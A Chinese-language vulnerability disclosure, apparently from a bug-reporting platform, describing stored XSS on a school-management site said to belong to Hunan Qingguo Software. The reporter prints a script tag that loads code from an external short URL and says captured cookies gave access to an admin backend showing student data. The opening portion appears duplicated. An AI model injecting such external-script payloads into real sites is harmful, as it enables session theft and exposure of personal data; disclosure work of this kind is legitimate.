### 简要描述: 提交的没通过,说是要完整的问题复现也是醉了。。。。。在提交一次 ### 详细说明: 漏洞利用代码: ``` <script src=http://t.cn/RUUNjzh></script> ``` [<img src="https://images.seebug.org/upload/201511/101332027be52a70f1fa959e95be041b78629790.png" alt="IC_E5%SEZU3{PLSB@ET39RO.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/101332027be52a70f1fa959e95be041b78629790.png) 这是同IP的网站的确隶属于湖南青果软件有限公司: [<img src="https://images.seebug.org/upload/201511/1013403548187a4b752ef0eb97daded8f6ae6ad3.png" alt="3Q)YC4SLH43EZYSC@E)7X$P.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/1013403548187a4b752ef0eb97daded8f6ae6ad3.png) [<img src="https://images.seebug.org/upload/201511/1013405368710c0ed012ddd7a3b75176eccf4d11.png" alt="XKO@WZG_4RPOYC`JHLFDYV9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/1013405368710c0ed012ddd7a3b75176eccf4d11.png) ### 漏洞证明: ``` 漏洞证明 ``` [<img...
### 简要描述: 提交的没通过,说是要完整的问题复现也是醉了。。。。。在提交一次 ### 详细说明: 漏洞利用代码: ``` <script src=http://t.cn/RUUNjzh></script> ``` [<img src="https://images.seebug.org/upload/201511/101332027be52a70f1fa959e95be041b78629790.png" alt="IC_E5%SEZU3{PLSB@ET39RO.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/101332027be52a70f1fa959e95be041b78629790.png) 这是同IP的网站的确隶属于湖南青果软件有限公司: [<img src="https://images.seebug.org/upload/201511/1013403548187a4b752ef0eb97daded8f6ae6ad3.png" alt="3Q)YC4SLH43EZYSC@E)7X$P.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/1013403548187a4b752ef0eb97daded8f6ae6ad3.png) [<img src="https://images.seebug.org/upload/201511/1013405368710c0ed012ddd7a3b75176eccf4d11.png" alt="XKO@WZG_4RPOYC`JHLFDYV9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/1013405368710c0ed012ddd7a3b75176eccf4d11.png) ### 漏洞证明: ``` 漏洞证明 ``` [<img src="https://images.seebug.org/upload/201511/10134224bd66a963107fa470e0aa691c9bc478f3.png" alt="3NTQQ[0B71B1%Y)O6L1R%3V.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/10134224bd66a963107fa470e0aa691c9bc478f3.png) [<img src="https://images.seebug.org/upload/201511/101343187fd9a31ae8eea7f5a2741542d3ac7281.png" alt="}Y@V`EB$}PP@[U]728`5F%X.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/101343187fd9a31ae8eea7f5a2741542d3ac7281.png) 以使用cookies登录后台界面看到学生数据: [<img src="https://images.seebug.org/upload/201511/10134404ef5db826da6cb4f16380e7faa06b47db.png" alt="})ME3D~A~}NA(U9ZK%T%NGU.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/10134404ef5db826da6cb4f16380e7faa06b47db.png) 这个是我昨天提交的漏洞代码源代码可以清楚的看见成功插入的XSS code: [<img src="https://images.seebug.org/upload/201511/10134823410ad6a77e41e49ee2b87237eea5569c.png" alt="1GSY}}XJ73WK]XRLGQTTKM4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/10134823410ad6a77e41e49ee2b87237eea5569c.png)
